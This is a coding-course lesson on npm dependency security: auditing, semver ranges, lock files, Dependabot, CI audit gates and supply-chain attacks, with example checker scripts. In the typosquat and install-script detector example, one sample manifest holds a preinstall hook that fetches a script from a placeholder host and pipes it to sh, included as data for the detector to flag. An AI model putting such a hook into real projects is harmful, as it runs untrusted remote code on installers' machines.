LVL 04 — SENIOR-IN-TRAINING | SESSION 105 | DAY 105

DEPENDENCY SECURITY

🎫 PIXELCRAFT-091
🔒Security | 🟡 Medium | Priority: 🟠 High

npm audit reports 12 vulnerabilities (3 high, 9 moderate). Our dependencies have known flaws. Fix them all. Set up automated dependency updates. Understand the supply chain.
CONCEPTS.UNLOCKED
🔗
Supply Chain Security
Your app is only as secure as its dependencies. Your code trusts your dependencies. They trust THEIR dependencies. A vulnerability or malicious code in ANY transitive dependency affects YOUR app.
🔍
npm audit
Scan for known vulnerabilities. Checks every installed package version against the npm registry's advisory data (sourced from the GitHub Advisory Database). Reports severity: critical, high, moderate, low. Run it regularly — new vulnerabilities are disclosed daily. It only knows about reported flaws in published versions: a freshly hijacked release with no advisory yet will come back clean.
📌
Semantic Versioning
MAJOR.MINOR.PATCH → 2.1.3. ^2.1.3 means "compatible updates": >=2.1.3 <3.0.0. ~2.1.3 means "patch updates only": >=2.1.3 <2.2.0. Below 1.0 the caret is stricter (^0.1.3 allows only 0.1.x), and a bare 2.1.3 is an exact pin. Understand the caret and tilde — they control what npm install brings in.
🔒
Lock Files
package-lock.json ensures reproducible installs. Records the exact version, download URL (resolved) and tarball hash (integrity) of every dependency and sub-dependency. npm ci installs exactly what's in the lock file — it wipes node_modules first and refuses to run if package.json and the lock disagree — so you get the same versions on every machine, every deploy. Use npm ci in CI and deploys; npm install is for changing dependencies locally.
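Added example, written for this page and not code from the lesson or from npm: the caret/tilde rules from the Semantic Versioning card, applied as a consistency check over a lockfileVersion 3 package-lock.json together with the two fields npm ci relies on, resolved and integrity. The lock data, package names, integrity strings and allowed-host list are all constructed for the example; prerelease tags are not handled.

```javascript
// Added example: semver range rules + a lock-file sanity check.
// Everything named here (pkg-a..pkg-d, mirror.example, the hashes) is made up.

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v); // prerelease tags deliberately unsupported
  if (!m) throw new Error(`not MAJOR.MINOR.PATCH: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}
const cmp = (a, b) => a[0] - b[0] || a[1] - b[1] || a[2] - b[2];
const fmt = (v) => v.join('.');

// Range for a package.json spec as [min inclusive, max exclusive].
// ^ = "compatible": ^2.1.3 -> <3.0.0, but below 1.0 the caret is stricter:
// ^0.1.3 -> <0.2.0 and ^0.0.3 -> <0.0.4 (the semver.org rule people forget).
// ~ = "patch only": ~2.1.3 -> <2.2.0. A bare version is an exact pin.
function rangeFor(spec) {
  const op = spec[0] === '^' || spec[0] === '~' ? spec[0] : '';
  const [M, m, p] = parseVersion(spec.slice(op.length));
  let max;
  if (op === '^') max = M > 0 ? [M + 1, 0, 0] : m > 0 ? [0, m + 1, 0] : [0, 0, p + 1];
  else if (op === '~') max = [M, m + 1, 0];
  else max = [M, m, p + 1];
  return { min: [M, m, p], max };
}
function describe(spec) {
  const r = rangeFor(spec);
  return `>=${fmt(r.min)} <${fmt(r.max)}`;
}
function satisfies(version, spec) {
  const r = rangeFor(spec), v = parseVersion(version);
  return cmp(v, r.min) >= 0 && cmp(v, r.max) < 0;
}

// Constructed lock in the lockfileVersion 3 layout: one entry per install path.
const fakeHash = (c) => 'sha512-' + c.repeat(86) + '=='; // placeholder SRI string
const sampleLock = {
  name: 'pixelcraft', lockfileVersion: 3,
  packages: {
    '': { name: 'pixelcraft', dependencies: { 'pkg-a': '^2.1.3', 'pkg-b': '~1.4.0', 'pkg-c': '^0.1.3' } },
    'node_modules/pkg-a': { version: '2.9.0', resolved: 'https://registry.npmjs.org/pkg-a/-/pkg-a-2.9.0.tgz', integrity: fakeHash('A') },
    'node_modules/pkg-b': { version: '1.5.0', resolved: 'https://registry.npmjs.org/pkg-b/-/pkg-b-1.5.0.tgz', integrity: fakeHash('B') },
    'node_modules/pkg-c': { version: '0.1.9', resolved: 'http://mirror.example/pkg-c-0.1.9.tgz', integrity: fakeHash('C') },
    'node_modules/pkg-c/node_modules/pkg-d': { version: '0.0.9', resolved: 'https://registry.npmjs.org/pkg-d/-/pkg-d-0.0.9.tgz' }, // no integrity
  },
};

const ALLOWED_HOSTS = new Set(['registry.npmjs.org']);
// Package name is everything after the last "node_modules/" (keeps "@scope/name").
const nameOf = (path) => path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);

function checkLock(lock, allowedHosts = ALLOWED_HOSTS) {
  if (!(lock.lockfileVersion >= 2) || !lock.packages) throw new Error('need lockfileVersion 2 or 3');
  const declared = lock.packages['']?.dependencies ?? {};
  const issues = [];
  for (const [path, entry] of Object.entries(lock.packages)) {
    if (path === '') continue;
    const name = nameOf(path);
    const isDirect = path === `node_modules/${name}`;
    // npm ci refuses to install when the lock drifts outside package.json's range
    if (isDirect && declared[name] && !satisfies(entry.version, declared[name]))
      issues.push({ name, issue: `locked ${entry.version} is outside declared ${declared[name]} (${describe(declared[name])})` });
    // without an SRI hash npm cannot verify the tarball it downloads
    if (!/^sha(256|384|512)-[A-Za-z0-9+/]+={0,2}$/.test(entry.integrity ?? ''))
      issues.push({ name, issue: 'missing or malformed integrity hash' });
    if (entry.resolved) {
      const url = new URL(entry.resolved);
      if (url.protocol !== 'https:') issues.push({ name, issue: `resolved over ${url.protocol}` });
      if (!allowedHosts.has(url.hostname)) issues.push({ name, issue: `resolved from ${url.hostname}` });
    }
  }
  return issues;
}

for (const i of checkLock(sampleLock)) console.log(`${i.name}: ${i.issue}`);
```

Run with node. pkg-b is the case npm ci rejects (the locked version drifted outside the range package.json declares); the http:// mirror and the entry with no integrity hash are the two a reviewer should question, since neither lets npm verify what it installs.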
🤖
Dependabot / Renovate
Automated dependency update PRs. Dependabot opens a PR when a new version is available. CI runs tests against the update. Green → merge. Automated, tested, continuous security updates. One caveat: a green build proves the new version is compatible with your tests, not that it is trustworthy — skim the release notes and, for anything touching install scripts or network access, the diff, before merging.
⚖️
Update vs Replace
No updates in 2+ years? Consider replacing. Abandoned packages are a risk: no security patches, no compatibility updates. Find an actively maintained alternative or bring the code in-house.
HANDS-ON.TASKS
01
Run the Audit
npm audit
# 12 vulnerabilities (3 high, 9 moderate)
# followed by one entry per vulnerable package: severity, affected
# version range, the dependency path that pulls it in, and the fix
# (if one exists).
#
# The one-line "found 12 vulnerabilities ... run `npm audit` for details"
# summary is what npm install prints; npm audit itself is the full report.
02
Auto-Fix Safe Updates
npm audit fix
# Fixed 7 of 12 vulnerabilities
# (safe updates that stay inside the semver ranges package.json declares)

# For the remaining 5, the fix needs a major version bump:
npm audit fix --force
# ⚠️ --force installs breaking major-version changes, and may pull
#    in new transitive dependencies of its own.
#    Review the changelog FIRST.

# Better approach: update the specific package manually
npm install package-name@latest
# Then run the test suite to verify nothing broke.

# If no fixed version exists at all, audit fix cannot help:
# replace the package (task 03) or document the accepted risk.
03
Replace Abandoned Packages
# Check package health:
# - Last published: > 2 years ago? ⚠️
# - Open issues piling up? ⚠️
# - Maintainer inactive? ⚠️

# Common replacements:
# moment.js → date-fns or dayjs
# request   → node-fetch or undici
# lodash    → lodash-es (tree-shakeable)

# Decision framework:
# 1. Is there a maintained fork?
# 2. Is there a modern alternative?
# 3. Can you vendor the code (copy it)?
# 4. Can you write it yourself?
04
Enable Dependabot
# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "weekly"
    open-pull-requests-limit: 10
    labels:
      - "dependencies"
    reviewers:
      - "your-username"

# Dependabot will:
# - Check for updates weekly
# - Open PRs with changelogs
# - CI runs tests against updates
# - You review and merge
# Automated, tested, continuous.
05
Add Audit to CI Pipeline
# Add to .github/workflows/ci.yml, after the `npm ci` step
# (so the audit sees the exact tree the lock file installs):
      - name: Security audit
        run: npm audit --audit-level=high

# --audit-level=high:
# Fail the build (non-zero exit) if HIGH or CRITICAL
# vulnerabilities are found.
# Moderate/low are still printed but don't block.

# Verify locally:
npm audit
# found 0 vulnerabilities ✅
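Added example, not code from the lesson or from npm: the rule behind --audit-level, implemented over the JSON form of the report (npm audit --json), plus a triage of which findings npm audit fix can take without --force. The report below is constructed and its package names are placeholders, not real advisories; the fixAvailable shapes (true, false, or an object carrying isSemVerMajor) are this example's reading of npm 7+ reports and are stated here as an assumption.

```javascript
// Added example: the --audit-level decision over a constructed `npm audit --json` report.
// Package names and ranges are placeholders; nothing here is a real advisory.

const SEVERITIES = ['info', 'low', 'moderate', 'high', 'critical'];
const rank = (s) => SEVERITIES.indexOf(s);

const sampleReport = {
  auditReportVersion: 2,
  vulnerabilities: {
    'pkg-a': { name: 'pkg-a', severity: 'moderate', isDirect: false, range: '<1.2.0', fixAvailable: true },
    'pkg-b': { name: 'pkg-b', severity: 'high', isDirect: false, range: '<4.0.2', fixAvailable: true },
    // fixAvailable as an object with isSemVerMajor: the only fix bumps a direct
    // dependency across a major version, which is what `npm audit fix --force` does.
    'pkg-c': { name: 'pkg-c', severity: 'high', isDirect: true, range: '<=2.9.9',
               fixAvailable: { name: 'pkg-c', version: '3.0.0', isSemVerMajor: true } },
    'pkg-d': { name: 'pkg-d', severity: 'low', isDirect: true, range: '*', fixAvailable: false },
  },
  metadata: { vulnerabilities: { info: 0, low: 1, moderate: 1, high: 2, critical: 0, total: 4 } },
};

// Mirrors the exit-code rule: non-zero if any finding is at or above the level.
function auditGate(report, auditLevel = 'high') {
  if (rank(auditLevel) < 0) throw new Error(`unknown audit level: ${auditLevel}`);
  const findings = Object.values(report.vulnerabilities ?? {});
  const blocking = findings
    .filter((v) => rank(v.severity) >= rank(auditLevel))
    .map((v) => v.name);
  const counts = Object.fromEntries(SEVERITIES.map((s) => [s, 0]));
  for (const v of findings) counts[v.severity] = (counts[v.severity] ?? 0) + 1;
  return { fail: blocking.length > 0, blocking, counts };
}

// Triage for task 02: in-range fixes `npm audit fix` applies on its own,
// semver-major fixes that need --force, and findings with no fix at all.
function triage(report) {
  const out = { safe: [], needsForce: [], unfixable: [] };
  for (const v of Object.values(report.vulnerabilities ?? {})) {
    const fix = v.fixAvailable;
    if (fix === true || (fix && !fix.isSemVerMajor)) out.safe.push(v.name);
    else if (fix && fix.isSemVerMajor) out.needsForce.push(v.name);
    else out.unfixable.push(v.name);
  }
  return out;
}

const gate = auditGate(sampleReport, 'high');
console.log(gate.fail ? `FAIL: ${gate.blocking.join(', ')}` : 'PASS', gate.counts);
console.log(triage(sampleReport));
```

With the sample report the gate fails on pkg-b and pkg-c; the same report passes at --audit-level=critical, which is why the level is a policy decision to write down, not a default to accept. pkg-d has no fix, so it stays in the report until the package is replaced.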
06
Close the Ticket
git switch -c security/PIXELCRAFT-091-deps
git add package.json package-lock.json .github/
git commit -m "Fix 12 dependency vulns + Dependabot (PIXELCRAFT-091)"
git push origin security/PIXELCRAFT-091-deps
# PR → Review → Merge → Close ticket ✅
CS.DEEP-DIVE

The software supply chain is a trust hierarchy.

Supply chain attacks are one of the fastest-growing security threats in software. Your code is only as secure as every package it depends on — including transitive dependencies you've never heard of.

// Trust chain:

Your code
  → trusts 50 direct dependencies
  → which trust 500 transitive deps
  → any one compromised = you're hit

// Notable incidents:

event-stream (2018)
  Hijacked npm package
  Stole cryptocurrency
  Downloaded 8M times

colors + faker (2022)
  Maintainer sabotaged his own packages
  colors: infinite loop printing garbage to the console
  faker: gutted and published empty
  Affected thousands of projects

ua-parser-js (2021)
  Hijacked to install cryptominers
  8M weekly downloads

// Mitigation:
// Audit regularly. Pin versions.
// Use lock files. Minimize deps.
// Automate updates. Stay vigilant.
"Supply Chain Lab"
[A]Run npx npm-check to find unused, outdated, and missing dependencies in PixelCraft. Remove unused packages — every dependency is attack surface. Less is more.
[B]Set up Socket.dev or Snyk for deeper supply chain analysis: detect typosquatting (lodash → l0dash), unusual install scripts, and obfuscated code. These catch threats that npm audit misses.
[C]Research: what is an SBOM (Software Bill of Materials)? How do companies like Google track every dependency in their supply chain? Write a brief analysis of supply chain security best practices for PixelCraft.
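Added example, written for this page and not code from Socket.dev, Snyk or the lesson: two of the heuristics lab item [B] names, a typosquat check and an install-script check, run over constructed package.json manifests. The popular-package list, the manifests and every package name below are placeholders chosen for the example.

```javascript
// Added example: cheap supply-chain heuristics over package.json manifests.
// POPULAR and sampleManifests are constructed; l0dash, expresss, image-kit are made up.

const POPULAR = ['lodash', 'express', 'react', 'axios', 'chalk', 'commander'];
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed manifests keyed by package name, shaped like package.json.
const sampleManifests = {
  'l0dash':    { name: 'l0dash', version: '4.17.21', scripts: { postinstall: 'node ./setup.js' } },
  'expresss':  { name: 'expresss', version: '4.18.2' },
  'chalk':     { name: 'chalk', version: '5.3.0', scripts: { test: 'ava' } },
  'image-kit': { name: 'image-kit', version: '1.0.0',
                 scripts: { preinstall: 'curl -s https://example.invalid/x | sh' } },
};

// Standard edit distance (insert/delete/substitute).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Fold digit/letter look-alikes (0/o, 1/l) so "l0dash" matches "lodash"
// even at distance 0; then flag any non-popular name within maxDistance
// of a popular one.
const fold = (s) => s.toLowerCase().replace(/0/g, 'o').replace(/1/g, 'l');
function typosquatSuspects(names, popular = POPULAR, maxDistance = 1) {
  const known = new Set(popular);
  const out = [];
  for (const name of names) {
    if (known.has(name)) continue; // the real package, not a look-alike
    for (const p of popular) {
      if (levenshtein(fold(name), fold(p)) <= maxDistance) {
        out.push({ name, lookalike: p });
        break;
      }
    }
  }
  return out;
}

// Every lifecycle hook that runs arbitrary code at install time.
function installScripts(manifests) {
  const out = [];
  for (const m of Object.values(manifests))
    for (const hook of INSTALL_HOOKS)
      if (m.scripts?.[hook]) out.push({ name: m.name, hook, command: m.scripts[hook] });
  return out;
}

console.log(typosquatSuspects(Object.keys(sampleManifests)));
console.log(installScripts(sampleManifests));
```

Install hooks are the usual place npm malware executes, so the cheap mitigation is `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) with scripts re-enabled only for the packages that genuinely need them, typically native modules. A distance-1 match is a prompt to look, not proof: plenty of legitimate packages sit one edit away from a popular name.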
REF.MATERIAL
ARTICLE
npm
Official audit documentation: running audits, understanding reports, fixing vulnerabilities, and configuring audit levels.
NPM · OFFICIAL · ESSENTIAL
ARTICLE
GitHub
Official Dependabot guide: configuration, security updates, version updates, and grouping strategies.
DEPENDABOT · OFFICIAL
VIDEO
Fireship
Quick overview of npm supply chain attacks: event-stream, colors, and how to protect yourself. Why node_modules is a security nightmare.
SECURITY · QUICK
ARTICLE
Tom Preston-Werner
The semver spec: MAJOR.MINOR.PATCH, when to increment which, and what ^ and ~ mean in package.json. The versioning standard.
SEMVER · OFFICIAL
ARTICLE
Socket
Supply chain security: detect typosquatting, suspicious install scripts, and vulnerability risk. Deeper analysis than npm audit alone.
SECURITY · TOOL
// LEAVE EXCITED BECAUSE
Zero vulnerabilities. Automated updates via Dependabot. CI blocks high-severity issues. You understand the supply chain — and how to protect against it.